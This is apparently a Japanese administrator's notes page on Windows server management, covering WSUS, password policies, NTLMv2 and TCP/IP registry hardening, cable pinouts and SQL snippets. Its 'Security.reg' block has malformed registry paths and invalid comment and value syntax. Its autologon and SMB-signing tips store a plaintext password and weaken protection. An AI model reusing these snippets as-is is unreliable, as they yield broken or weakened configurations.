3: サーバー(ドメインコントローラ以外のサーバOS)
processor_arch
プロセッサアーキテクチャを示す。(32ビットマシンの場合、この値は0)
language ja-JP(日本語/日本)といったISO形式でクライアントOSの言語/地域を示す。
status 処理のステータスを示します。
値 s: 成功: 処理は、完全かつ無事に実行されました。
r: 成功 (再起動が必要): ここまでの処理の実行は成功しました。再起動して続行する必要があります。
f: 失敗: ユーザによる取り消し以外の理由で、処理の実行が失敗しました。
c: 取り消し: ユーザによって、実行中に処理が取り消されました。
d: 拒否: ユーザによって、処理が拒否されました。
n: 項目なし: 処理を実行できる更新項目がありません。
p: 保留: (おそらく)想定されていない状態です(注 12)。
error 処理の結果を8桁の16信数で示します(注 13)。使用されない場合、値は0になります。
message 発生したエラーの説明が含まれます。
proxy 状態メッセージのタイムスタンプを格納します。タイムスタンプの形式は、YYMMDDHHMMSSmmmです。
SUS 1.0 を実行しているサーバーを、2005 年 12 月 12 日 (米国時間) より後に SP1 と同期すると、以前に許可された更新プログラムが許可されなくなる場合がある
http://support.microsoft.com/kb/912307/ja
●WSUS の準備
必要コンポーネント
Windows 2000 Server の場合
・IIS5.0
・IE6.0 SP1
・.NET Framework1.1 SP1
・BITS2.0
・MSDE2000 Rel.a(SQL Server 2000 SP3 相当のデータベース)データベースサイズは最大2GB
※ MSDE セットアップ時には パスワードを設定しないとインストール中に失敗します。「C:\MSDERelA\Setup.exe SAPWD="sa password"」など。
Windows Server 2003 の場合
・IIS6.0
・.NET Framework1.1 SP1
・BITS2.0
・WMSDE(WSUSのインストールパッケージに同根)データベースサイズの上限なし
※SQLServer 2005 Express Edition が上限4GBなので制限あるかも。Workgroup Edition は上限なし
SharePoint の対応
・Web サイトへの匿名アクセスを許可
・SharePoint の管理コンソールで既定 Web サイトに以下のパスを追加
/iuident.cab
/wutrack.bin
/clientwebservice
/Selfupdate
URLScan がインストールされている場合の設定
Urlscan.ini ファイルを編集し。
DenyExtensions から .exe のエントリを削除
AllowVerbs に以下 4つの設定が登録されていることを確認
GET
HEAD
POST
OPTIONS
Windows Server Update Services Release Candidate Open Evaluation
Windows Server Update Services がリリースされました
マイクロソフト、Windows Server Update Services (WSUS)を、6月7日(火)より無償提供開始
Software Update Services および Windows Server Update Services におけるコンテンツの変更について
Windows Server Update Services (@IT)
Windows Update v6
http://update.microsoft.com/
Microsoft Upate
http://update.microsoft.com/microsoftupdate/
ちなにみ WSUS は ↑ を見に行くようです。
905682 - Microsoft Software Update Services 1.0 のサポート ライフサイクル
http://support.microsoft.com/kb/905682/
[運用]Windows Server Update Services
http://www.atmarkit.co.jp/fwin2k/operation/wsus01/wsus01_01.html
WSUSでパッチ管理はどう変わるのか?(後編)
http://www.atmarkit.co.jp/fwin2k/operation/wsus02/wsus02_01.html
WSUSサーバでクライアントが表示されない場合の対処法
http://www.atmarkit.co.jp/fwin2k/win2ktips/707wsussid/wsussid.html
Microsoft Windows Server Update Services 3.0
http://www.microsoft.com/japan/technet/windowsserver/wsus/30/default.mspx
試す前に WSUS 3.0 になってしまった。。。
特徴
・64bit版ネイティブサポート
・WSUS2.0 を引き継いでアップグレード可能
WSUS の Windows クライアントを再登録する方法。
http://support.microsoft.com/kb/555974
WSUS 2.0 をインストール後にコンピュータ名を変更した場合のアップグレード
http://blogs.technet.com/jpwsus/archive/2009/05/01/wsus-2-0.aspx
WSUS 2.0 SP1 からのアップグレードについて
http://blogs.technet.com/jpwsus/archive/2008/06/03/wsus-3.0-upgrade-tips.aspx
マイクロソフト セキュリティ アドバイザリ (954960)
Microsoft Windows Server Update Services (WSUS) によるセキュリティ更新プログラムの展開がブロックされる
http://www.microsoft.com/japan/technet/security/advisory/954960.mspx
Windows XP SP3 をインストールした後、Windows Update、Microsoft Update、または自動更新で更新プログラムが正常にインストールされない
http://support.microsoft.com/kb/953541
Windows Server Update Services 3.0 と Windows Server Update Services 2.0 が混在するレプリカ構成で新規のインストール承認を追加した場合、”期日なし” でインストール承認された更新プログラムに対し、第 2 階層目の WSUS 2.0 サーバーで期日が設定される
http://support.microsoft.com/kb/968514
WSUS 3.0 SP1 へのアップグレード
http://blogs.technet.com/jpwsus/archive/2009/04/22/wsus-3-0-sp1.aspx
別の筐体の SQL Server を使用している環境を WSUS 3.0 SP1 にアップグレードする
http://blogs.technet.com/jpwsus/archive/2009/04/22/sql-server-wsus-3-0-sp1.aspx
WSUS が親子構成されている環境を WSUS 3.0 SP1 にアップグレードする
http://blogs.technet.com/jpwsus/archive/2009/04/22/wsus-wsus-3-0-sp1.aspx
[システム管理編]●第2回 野放しのパッチ管理から群管理のパッチ管理へ
http://itpro.nikkeibp.co.jp/article/COLUMN/20081110/318940/
そこが知りたい
Windows Server Update Services(第15回)
Q1 新しいWSUS 3.0 SP2は何が変わったのか?
http://www.atmarkit.co.jp/fwin2k/operation/wsusqa15/wsusqa15_01.html
Q1 既存のWSUSサーバをWSUS 3.0 SP2にアップグレードするには?
http://www.atmarkit.co.jp/fwin2k/operation/wsusqa16/wsusqa16_01.html
パスワード ポリシーの既定の設定と最低限の推奨設定
| ポリシー |
既定の設定 |
最低限の推奨設定 |
| パスワード履歴を記録する |
過去 1 回のパスワード変更を記録 |
過去 24 回のパスワードを記録 |
| パスワード有効期間 |
42 日 |
42 日 |
| パスワードの変更禁止期間 |
0 日 |
2 日 |
| パスワードの長さ |
0 文字 |
8 文字 |
| パスワードは要求する複雑さを満たす |
無効 |
有効 |
| 暗号化を元に戻せる状態でドメインのすべてのユーザーのパスワードを保存する |
無効 |
無効 |
Account ポリシーの既定の設定と推奨設定
| ポリシー |
既定の設定 |
最低限の推奨設定 |
| ロック アウト期間 |
未定義 |
30 分 |
| アカウントのロックアウトのしきい値 |
0 |
5 回ログ オンに失敗 |
| ロックアウト カウントのリセット |
未定義 |
30 分 |
メンバ サーバー ベースライン セキュリティ オプション ポリシーの設定
| オプション |
設定 |
| 匿名接続の追加を制限する |
明示的な匿名アクセス権がない場合アクセスを許可しない |
| サーバー オペレータがタスクのスケジュールを割り当てるのを許可する (ドメイン コントローラのみ) |
無効 |
| システムをシャットダウンするのにログオンを必要としない |
無効 |
| リムーバブル NTFS メディアを取り出すのを許可する |
Administrators |
| セッションを切断する前に、ある一定のアイドル時間を必要とする |
15 分 |
| グローバル システム オブジェクトへのアクセスを監査する |
無効 |
| バックアップと復元の特権の使用を監査する |
無効 |
| ログオン時間を経過した場合は自動的にユーザーをログオフする |
有効 |
| ログオン時間が時間切れになった場合、自動的にユーザーをログオフする (ローカル) |
有効 |
| システムのシャットダウン時に仮想メモリのページ ファイルをクリアする |
有効 |
| 常にクライアント側の通信にデジタル署名を行う |
有効 |
| 可能な場合、クライアントの通信にデジタル署名を行う |
有効 |
| 常にサーバーの通信にデジタル署名を行う |
有効 |
| 可能な場合、サーバーの通信にデジタル署名を行う |
有効 |
| ログオンに Ctrl+Alt+Del を必要としない |
無効 |
| ログオン画面に最後のユーザー名を表示しない |
有効 |
| LAN Manager 認証レベル |
NTLMv2 応答のみ送信し、LM と NTLM を拒否する |
| ログオン時のユーザーへのメッセージのテキスト |
|
| ログオン時のユーザーへのメッセージのタイトル |
|
| ドメイン コントローラが利用できない場合に使用する、前回ログオンのキャッシュ数 |
0 回 |
| コンピュータ アカウント パスワードのシステム保守をしない |
無効 |
| ユーザーがプリンタ ドライバをインストールできないようにする |
有効 |
| パスワードが無効になる前にユーザーに変更を促す |
14 日 |
| 回復コンソール: 自動管理ログオンを許可する |
無効 |
| 回復コンソール: すべてのドライブとフォルダにフロッピーのコピーとアクセスを許可する |
無効 |
| Administrator アカウント名の変更 |
未定義 |
| Guest アカウント名の変更 |
未定義 |
| CD-ROM へのアクセスを、ローカル ログオン ユーザーだけに制限する |
有効 |
| フロッピーへのアクセスを、ローカル ログオン ユーザーだけに制限する |
有効 |
| セキュリティで保護されたチャネル: 常にセキュリティ チャネルのデータをデジタル的に暗号化または署名する |
有効 |
| セキュリティで保護されたチャネル: 可能な場合、セキュリティ チャネルのデータをデジタル的に暗号化または署名する |
有効 |
| セキュリティで保護されたチャネル: 可能な場合、セキュリティ チャネルのデータをデジタル的に署名する |
有効 |
| セキュリティで保護されたチャネル: 強力な (Windows 2000 かそれ以降のバージョン) セッション キーを必要とする |
有効 |
| システム パーティションの保護 (RISC プラットフォームのみ) |
未定義 |
| サード パーティ製の SMB サーバーへ接続するためのパスワードを、暗号化しないで送信する |
無効 |
| セキュリティ監査のログを記録できない場合は直ちにシステムをシャットダウンする |
有効 ※事前にセキュリティ ログのサイズを増やしておく |
| スマート カード取り出し時の動作 |
ワークステーションをロックする |
| グローバル システム オブジェクトの既定のアクセス許可を強化する (例: シンボリック リンク) |
有効 |
| 署名されていないドライバのインストール時の動作 |
インストールを許可しない |
| 署名されていないドライバ以外のインストール時の動作 |
警告するがインストールは許可する |
セキュリティ設定およびユーザー権利の割り当てを変更すると、クライアント、サービス、およびプログラムとの互換性がなくなる
第 5 章 - セキュリティの構成
Windows 95/98 クライアントで NTLMv2 認証を有効にするには
1. Microsoft Internet Explorer 4.x または 5 をインストールし、128 ビットのセキュリティで保護された接続のサポートに更新する
(NT4.0でNTLM2 認証を有効にするには Service Pack 4以降 が必要となります)
インストールされているバージョンを確認するには
エクスプローラを使用して、%SystemRoot%\System フォルダから Secur32.dll ファイルを検索
このファイルを右クリックし、[プロパティ] をクリック
[バージョン情報] タブをクリック 56 ビット バージョンでは、
"Microsoft Win32 Security Services (Export Version)" という説明が
128 ビット バージョンの説明は、 "Microsoft Win32 Security Services (US and Canada Only)" となります。
2. ディレクトリ サービス クライアント(DSCLIENT.EXE)をインストール
ディレクトリ サービス クライアントは、Windows 2000 CD-ROM に Clients\Win9x\Dsclient.exe として収録されています。
Windows 95/98 コンピュータで Dsclient.exe を実行すると、NTLM 2 サポートを提供するシステム ファイルも自動的にインストールされます。
インストールされるファイルは、Secur32.dll、Msnp32.dll、Vredir.vxd、および Vnetsup.vxd です。
NTLM 2 システム ファイルは、強化されたセキュリティ機能およびセキュリティ関連のフィックスの両方を提供するため、
Dsclient をアンインストールしても削除されません。
3. 下記を参考にレジストリを設定。
クライアントで NTLMv2 をアクティブ化するには
※レジストリ エディタの使い方を誤ると、深刻な問題が発生することがあります。
最悪の場合、オペレーティング システムの再インストールが必要です。
レジストリ エディタは、自己の責任においてご使用ください。
レジストリ エディタ (Regedit.exe) を起動します。
次のレジストリ キーを見つけてクリックします。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
上記のレジストリ キーに、LSA というレジストリ キーを作成します。
[編集] メニューの [値の追加] をクリックし、次のレジストリの値を追加します。
値の名前 : LMCompatibility NTは、LMCompatibilityLevel
データ型 : REG_DWORD
値 : 5
0 - LM および NTLM 応答を送信する。 (XP までのデフォルト)
1 - ネゴシエートされた場合に NTLM 2 セッション セキュリティを使用する。
2 - NTLM 応答のみを送信する。
3 - NTLM 2 応答のみを送信する。 (2003, VISTA のデフォルト)
4 - ドメイン コントローラは LM 応答を拒否する。
5 - ドメイン コントローラは、LM および NTLM 応答を拒否する (NTLM 2 のみを受け入れる)。
以下のレジストリ キーを変更することにより、SSP (NTLM Security Support Provider) を利用するプログラムで使われる、
最小のセキュリティを構成できます。これらの値は、LMCompatibilityLevel 値に依存します。
レジストリ エディタ (Regedit.exe) を起動します。
次のレジストリ キーに移動します。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\LSA\MSV1_0
値の名前 : NtlmMinClientSec
データ型 : REG_WORD
値 : 以下の値のいずれか
0x00000010 - メッセージの整合性
0x00000020 - メッセージの機密性
0x00080000 - NTLM 2 セッション セキュリティ
0x20000000 - 128 ビットの暗号化
0x80000000 - 56 ビットの暗号化
NTLM 2 認証を有効にする方法
Windows 95 または Windows NT 4.0 クライアントで Windows Server 2003 ドメインにログオンするとエラー メッセージが表示される
Windows NT 上の LM 認証を無効にする方法
マイクロソフトの Securing Windows 2000 Server ソリューション 第 7 章 ‐ 特定サーバーの役割のハードニング
http://www.microsoft.com/japan/technet/security/prodtech/windows2000/secwin2k/07ssrole.mspx
IIS Server 6 で、NTLM 認証を強制的に行うにはどのようにしたらよいですか?
http://www.microsoft.com/japan/technet/community/columns/insider/iisi0804.mspx
マックからのファイル共有について。
バージョン 5.0.11 以降で NTLMv2 認証をサポートしているようです。
http://www.microsoft.com/mac/otherproducts/otherproducts.aspx?pid=windows2000sfm
NTLMv2 認証では、認証情報の暗号化機能やパスワードの使用可能文字数などの点で
Mac OS 標準 UAM より優れていますので、こちらを利用しましょう。
※ Windows 2000 Server の Microsoft UAM Volume にある Microsoft UAM は
NTLMv2 認証をサポートしてませんので、上記 URL から NTLMv2 対応バージョンをダウンロード
また、Microsoft UAM の NTLMv2 認証機能は、バージョン 3.8 以降の「AppleShare Client」が必要になります。
認証に対する保護の強化
マイクロソフト セキュリティ アドバイザリ(973811)
http://www.microsoft.com/japan/technet/security/advisory/973811.mspx
NTLMv2 と合わせて設定するのが良いかな。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA
値の名前 : SuppressExtendedProtection
データ型 : REG_WORD
値 : 0
デフォルトは1で保護無効。
LmCompatibilityLevel のキーを 3 以上にする必要あり
Telnet でも利用可能
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0
値の名前 : ExtendedProtection
データ型 : REG_WORD
値 : 0
認証に対する保護の強化を無効にする:0(デフォルト)
拡張された保護を許可する:1
拡張された保護を必須:2
LM ハッシュの作成を無効化する
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\
値の名前 : NoLMHash
データ型 : REG_DWORD
値 : 1
Windows でパスワードの LAN Manger ハッシュが Active Directory とローカル SAM データベースに保存されないよう にする方法
http://support.microsoft.com/kb/299656/ja
LanManHash 用 RainbowTable の作成
http://www.insi.co.jp/news/20060529-news.html
Windows認証を数秒で解析脆弱なパスワードは即座に破られる
http://itpro.nikkeibp.co.jp/members/NBY/ITARTICLE/20040601/1/
Windows 95/98 から Windows Server 2003 の共有フォルダにアクセス出来ない場合の対策
・上記のディレクトリ サービス クライアント(DSCLIENT.EXE)をインストールする
・Windows Server 2003 のポリシー設定で「SMB署名を無効にする」
のどちらかの設定をします。 SMB署名を無効にするには
[コンピュータの構成]
[Windows の設定]
[セキュリティの設定]
[ローカル ポリシー]
[セキュリティ オプション]
[Microsoft ネットワーク サーバー: 常に通信にデジタル署名を行う]
から変更出来ます。 Windows 2000 ドメイン コントローラを Windows Server 2003 にアップグレードする方法
セキュリティアップの為のレジストリ操作
以下を「Security.reg」と言う名で保存し、実行すれば反映されます。
Windows Registry Editor Version 5.00
'ネットワーク攻撃に対するセキュリティ対策
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSetServices\Tcpip\Parameters]
'Synattack保護
"SynAttackProtect"=dword:0x00000002
'断片化が起こることを防止
"EnablePMTUDiscovery"=dword:0x00000000
'停止しているゲートウェイを検出させない
"EnableDeadGWDetect"=dword:0x00000000
'TCPがKeep Aliveパケットを送信してアイドル状態の接続がそのままであることを確認する頻度
"KeepAliveTime"=dword:0x000493e0
'ICMP着信転送メッセージに応答してルートテーブルを変更させない
"EnableICMPRedirect"=dword:0x00000000
'IPセキュリティフィルタを有効
"EnableSecurityFilters"=dword:0x00000001
' 着信パケットのうち、ソースルーティングされたパケットをすべて破棄
"DisableIPSourceRouting"=dword:0x00000002
'SYN-ACKを転送するときに、応答があるまで再転送を繰り返す回数
"TcpMaxConnectResponseRetransmissions"=dword:0x00000002
'データセグメントの再転送回数
"TcpMaxDataRetransmissions"=dword:0x00000003
'SYN-ATTACK保護の適用を開始するタイミングを制御
"TCPMaxPortsExhausted"=dword:0x00000005
'RFC1256に基づくルーター検出を実行させない
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces]
"PerformRouterDiscovery"=dword:0x00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSetServices\AFD\Parameters]
'新しい接続を追加する必要があるときに作成する空き接続の数
"DynamicBacklogGrowthDelta"=dword:0x0000000a
"EnableDynamicBacklog"=dword:0x00000001
"MinimumDynamicBacklog"=dword:0x00000014
"MaximumDynamicBacklog"=dword:0x00004e20
'NetBIOS名を解放
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netbt\Parameters]
"NoNameReleaseOnDemand"=dword:0x00000001
'短いファイル名 (8.3 形式) の自動生成を無効化する
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSetControl\FileSystem]
"NtfsDisable8dot3NameCreation"=dword:0x00000001
'LM ハッシュの作成を無効化する
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSetControl\Lsa]
"NoLMHash"=dword:0x00000001
'NTLMSSP セキュリティを構成する
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSetControl\Lsa\MSV1_0]
"NtlmMinServerSec"=dword:0x20000000
'自動実行を無効化する
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword=0x000000FF
詳しくは
Windows 2000 Server セキュリティ運用ガイドの第4章を確認して下さい。
第 5 章 - セキュリティの構成
セキュリティ ベストプラクティス 管理権限におけるデータ セキュリティとデータ可用性
ネットワーク攻撃に対して最大限の保護を提供するレジストリを設定する
攻撃に対するTCP/IPの応答のチューニングについいて
この設定は、システムを攻撃から完全に保護することを目的とするものではなく、あくまで攻撃に対するTCP/IPスタックの応答のチューニングを
主眼としてる。これらのキーをチューニングしても、システムへの攻撃に利用される可能性のあるそのほかのコンポーネントは制御できない。
ネットワークのサービス拒否攻撃に対して、NT または Windows 2000のネットワーク スタックを強化するには、次のようにレジストリを設定する。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : SynAttackProtect
データ型 : REG_DWORD
値 : 2
[0] (Synattack 保護なし)
1 (TcpMaxHalfOpen および TcpMaxHalfOpenRetried の設定に達した場合に、
再転送の試行回数を減らし、RCE (ルート キャッシュ エントリ) の作成を遅延する)
2 (1 に加えて、Winsock への指示を遅延する)
説明 : Synattack保護では、SYN-ACKSの再送信回数を減らすことで、リソースを割り当てたまま維持する時間を短縮する。
RCEリソースの割り当ては、接続が確立されるまで遅延されます。
SynAttackProtect = 2 の場合、AFD への接続指示は、3方向ハンドシェイクが完了するまで遅延される。
また、保護メカニズムが動作するのは、TcpMaxHalfOpen および TcpMaxHalfOpenRetried の設定値を超えた場合だけ。
メモ : システムが攻撃を検出した場合は、スケーラブルなウィンドウ(RFC1323)とアダプタごとに構成される
TCPパラメータ(初期RTT、ウィンドウサイズ)がすべてのソケットで無効になります。
これは、保護機能が働くと、SYN-ACKが送信されるまでRCEが照会されず、接続のこの段階では
Winsockオプションを使用できないため。
第2回 ステートフル・パケットインスペクション
http://www.atmarkit.co.jp/flinux/rensai/iptables202/iptables202a.html
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : TcpMaxHalfOpen
データ型 : REG_DWORD
値 : 100 (Professional、Server)、500 (Advanced Server)
有効範囲:100〜xFFFF
説明 : このパラメータは、SYN-RCVD状態の接続の数がいくつになった時点でSYN-ATTACK保護を開始するかを制御します。
SynAttackProtectが 1 に設定されている場合は、保護するポートのAFD受信バックログよりこの値を小さくする必要がある。
(バックログのパラメータを参照)。詳細については、「SynAttackProtect」を参照。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : TcpMaxHalfOpenRetried
データ型 : REG_DWORD
値 : 80 (Professional、Server)、400 (Advanced Server)
有効範囲 : 80〜xFFFF
説明 : このパラメータは、SYNが少なくとも1回再転送されているSYN-RCVD状態の接続の数がいくつになった時点で
SYN-ATTACK保護を開始するかを制御します。詳細については、「SynAttackProtect」を参照。
SQL Server の方にもちらっと記述がありました。
Windows Server 2003 SP1 で実行する場合、 4.1.2 接続が強制的に切断できます。
http://support.microsoft.com/kb/910228/ja
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : EnablePMTUDiscovery
データ型 : REG_DWORD
値 : 0
有効範囲 : 0、[1] (False、True)
説明 : このパラメータが1(True)に設定されている場合、TCPは、リモートホストへのパスの
MTU(最大転送ユニットまたは最大パケットサイズ)の検出を試みます。
パスのMTUを検出し、TCPセグメントをそのサイズに制限することにより、
異なるMTUのネットワークに接続するパスに沿って存在する各ルーターで断片化が起こることを防止します。
断片化は、TCPスループットに悪影響を及ぼし、ネットワークの混雑を招きます。
このパラメータを0に設定すると、ローカル サブネット上にないホストへのすべての接続に576バイトのMTUが使用される。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : EnableDeadGWDetect
データ型 : REG_DWORD ブール値
値 : 0
有効範囲 : 0、[1] (False、True)
説明 : このパラメータが1の場合、TCPは、停止しているゲートウェイの検出を実行できます。
この機能を有効にすると、複数の接続で問題が発生している場合に、TCPはIPにバックアップ ゲートウェイへの変更を要求します。
バックアップ ゲートウェイは、[コントロールパネル]⇒[ネットワーク]⇒[TCP/IP 設定]で、ダイアログボックスの[詳細]タブで定義できる。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : KeepAliveTime
データ型 : REG_DWORD
値 : 300000
有効範囲 : 1〜xFFFFFFFF [7,200,000 (2 時間)]
説明 : このパラメータは、TCPがKeep Aliveパケットを送信してアイドル状態の接続がそのままであることを確認する頻度を制御します。
リモート システムが到達可能で、機能している場合は、Keep Alive 転送を認識します。既定では、Keep Alive パケットは送信されない。
この機能は、アプリケーションから接続に対して有効にされることがある。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : EnableICMPRedirects
データ型 : REG_DWORD
値 : 0
有効範囲 : 0、[1] (False、True)
説明 : このパラメータは、ルーターなどのネットワークデバイスから送信されたICMP着信転送メッセージに応答して
Windows2000がルートテーブルを変更するかどうかを制御する。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
値の名前 : PerformRouterDiscovery
データ型 : REG_DWORD
値 : 0
0 (無効)
1 (有効)
[2] (DHCP がルーター検出オプションを送信した場合にだけ有効) (DHCP に制御されるが、既定ではオフ)
説明 : このパラメータは、Windows2000でインターフェイスごとにRFC1256に基づくルーター検出を実行するかどうかを制御します。
「SolicitationAddressBcast」も参照しておく。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netbt\Parameters
値の名前 : NoNameReleaseOnDemand
データ型 : REG_DWORD
値 : 1
有効範囲 : [0]、1 (False、True)
説明 : このパラメータは、コンピュータがネットワークから名前解放要求を受信した場合に、NetBIOS名を解放するかどうかを決定します。
このパラメータが追加されたことで、悪意のある名前解放攻撃からマシンを保護できるようになった。
各種サービスについても知りたい場合は、
脅威とその対策 : Windows Server 2003 と Windows XP のセキュリティ設定
システム サービス
Microsoft Windows Server System : ポート番号一覧
Microsoft Windows 2000 TCP/IP 実装詳細
Microsoft Windows Server 2003 TCP/IP 実装詳細
Windows Server 2003 セキュリティ ガイド
Windows Server 2003 で DoS 攻撃に対して TCP/IP スタックを強化する方法
に詳しく説明がされています。
Microsoft Windows レジストリの説明
W32.Kiman.B
http://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.kiman.b.html
にもレジストリの操作が書かれてますね。ウイルス対策にも効果があるのかな?
この辺りも。
Windows 2000 および Windows Server 2003 の TCP 機能について
http://support.microsoft.com/kb/224829
Windows Server 2003 で TCP/IP フィルタリングを構成する方法
http://support.microsoft.com/kb/816792
Windows Server 2003 でデフォルトでは無効になっているサービス
http://support.microsoft.com/kb/812519
ブラック ホール ルーターの診断と問題解決
http://support.microsoft.com/kb/159211
コンピュータのロックをショットカットで!
1.新規作成で、ショートカットを選択
2.リンク先に以下のアドレスを入力する。 %windir%\System32\rundll32.exe user32.dll,LockWorkStation
3.ショートカットの名前が「rundll32.exe」になるので、「ロック」等に変更する。
4.出来上がったショートカットをダブルクリックすると、コンピュータをロックする事が出来ます。
サービスパック適応済みWindows2000インストールイメージの作成方法
今回は例としてWindows2000サービスパック3(以下SP3)を適応することにします。
SP2に付属するupdate.exeコマンドは実行するのにWin2000のコマンドプロンプトが必要なので
以下の作業はWindows2000で行うことにします。
まずは、元となるWindows2000インストールCDのイメージを作業用ハードディスクフォルダに
コピーします。今回はDドライブの「D:WIN2K」というフォルダを作業用に作成し
EドライブにCD-ROMがマウントされてると仮定します。
Windows2000のファイル群はCD-ROMの\i386フォルダ以下にあるのでハードディスク側にも
「D:WIN2K\i386」というフォルダを作成し、そこにコピーします。
D:\>mkdir \WIN2K\i386
D:\>xcopy e:\i386 d:\WIN2K\i386 /e
次に、この作業フォルダに対してSP3を適応します。
SP2をネットから落とした場合には、「w2ksp3.exe」というアーカイブファイルが手に入るので
これを適当な場所に展開します。
CD-ROMならルートフォルダに「w2ksp3.exe」があるのでこれを同じく適当な場所に展開します。
今回は「D:\SP3」というフォルダに展開するとします。
コマンドラインから「w2ksp3.exe」を「/x」オプションをつけて実行すると途中で展開先を聞いてきます。
展開が完了したら展開作フォルダの中のi386\update(今回はD:\SP3\i386\update)に
update.exeというコマンドが展開されています。
作業フォルダにコピーしたWindows2000インストールイメージにSP3を適用するには
適用先の作業フォルダに「-s」コマンドを付けて指定しupdate.exeを実行します。
なおこのupdate.exeはWindows2000のコマンドプロンプトか、「ファイル名を指定して実行」から
起動してください。
D:\>D:\SP3\i386\update\update.exe -s:D:\WIN2K
こうすることで統合モードでupdate.exe画実行され指定先にSP3が適応されます。
実行中は下のようなダイアログが出ます。
Unattend.txt ファイルを使用して Microsoft Windows XP のライセンス認証を行う方法
Sysprep ツールを使用して Windows XP の展開を自動化する方法
Windows XP SP2 をインストールしたコンピュータで修復インストールを行う方法
また、個別のパッチも統合できるみたいです。
ソフトウェア更新プログラムを Windows インストール ソース ファイルに統合する方法
コンポーネントを追加したときに、セキュリティ更新プログラムが適応されない場合。
日本のセキュリティチームの Blog
に書かれているように、MBSA でチェックしましょう。
また DLL の情報は MS サイトに DLL Help という物があります。
LANケーブルを作る。
カテゴリ 用途 備考
1 音声
2 低速の通信 音声 ISDNなど
3 10Mbpsまでの通信 音声 10−BASET
4 16Mbpsまでの通信 あまり聞かない、見かけない
5 100Mbpsまでの通信 10・100BASE-T用
8本の線の説明
各線には色がついていて、この順番にも規格があります。
T-568AとT-568Bは米国の規格で決められた配列で、ANSI/TIA/EIA-568Aでは、T-568Aが主でT-568Bを従として採用。
T-568Aの配列が多いらしいです。両端同じならどちらでも動きます。
ピン 1 2 3 4 5 6 7 8
T568A 白/緑 緑 白/橙 青 白/青 橙 白/茶 茶
T568B 白/橙 橙 白/緑 青 白/青 緑 白/茶 茶
番号 信号 色(例)
1 +TD 橙白
2 −TD 橙
3 +RD 緑白
4 未接続 青
5 未接続 青白
6 −RD 緑
7 未接続 茶白
8 未接続 茶
TDは送信、RDは受信
LANケーブルの仕組みを理解して自作せよ (1/3)
http://www.itmedia.co.jp/enterprise/articles/0806/09/news019.html
SQL Server のバージョンを知る。
SQL = "select @@version as ver, @@servername as server"
CMD.CommandText = SQL
Set RS = CMD.Execute
Response.Write RS.Fields("ver").Value 'バージョン
Response.Write RS.Fields("server").Value 'サーバ名
SQL Server の設定で「大文字小文字を区別しない」になっている場合での、クエリによる区別の方法。
CONVERT コマンドで VARBINARY に指定して比較する。
例)
SELECT * FROM TABLE_NAME WHERE CONVERT(VARBINARY(20), RTRIM(Field)) = CONVERT(VARBINARY(20), '比較文字')
[NT]ANSI 以外の文字を使用した際 [含まれる文字列] で検索できない
日本語の検索は出来ないものと思って下さい。
#「予定」とか、Shift-JISコードに「0x5c」があれば
#人的にエスケープすれば、検索可能です。
#こんな感じ「予\定」で。
Internet Explorer のパスワード キャッシュを無効にする方法
KEY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
値の名前 : DisablePasswordCaching
データ型 : REG_DWORD
値 : 0x00000001
説明 : 再度パスワード キャッシュを無効にするには、レジストリの値の名前 DisablePasswordCaching を削除します。
または、値のデータを 0 に設定を変更します。
上記の設定しなくても信頼済みサイトに登録するとパスワード聞かれなくなったり・・・します。
マシンの環境によるのかな、、、どーなってるんでしょ・・・誰かしってます?
パスワード保存機能の無効化
KEY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Network
値の名前 : DisablePwdCaching
データ型 : REG_DWORD
値 : 0:キャッシュ有効、1:キャッシュ無効
ドメイン(.NET)キャッシュの無効化
KEY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
値の名前 : DisableDomainCreds
データ型 : REG_DWORD
値 : 0:キャッシュ有効、1:キャッシュ無効
WindowsNT系への自動ログオン
下記値を追加する事で、自動ログイン可能になります。
KEY HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
値の名前 : AutoAdminLogon
データ型 : REG_SZ
値 : 1
値の名前 : DefaultDomainName
データ型 : REG_SZ
値 : 自動ログオンしたいドメイン名
値の名前 : DefaultUserName
データ型 : REG_SZ
値 : 自動ログオンしたいユーザ名
値の名前 : DefaultPassword
データ型 : REG_SZ
値 : 自動ログオンしたいユーザ名のパスワード
XP や 2003 は コマンドラインから control userpasswords2 を利用するのが簡単。
Windows XP で自動ログオンを有効にする方法
システムに自動ログオンする方法(ユーザー管理ツール編)
システムに自動ログオンする方法(TweakUI編)
ADOを使ってバイナリデータを出力する。
Option Explicit
Response.AddHeader "Content-Disposition", "inline;filename=" & "path to the file"
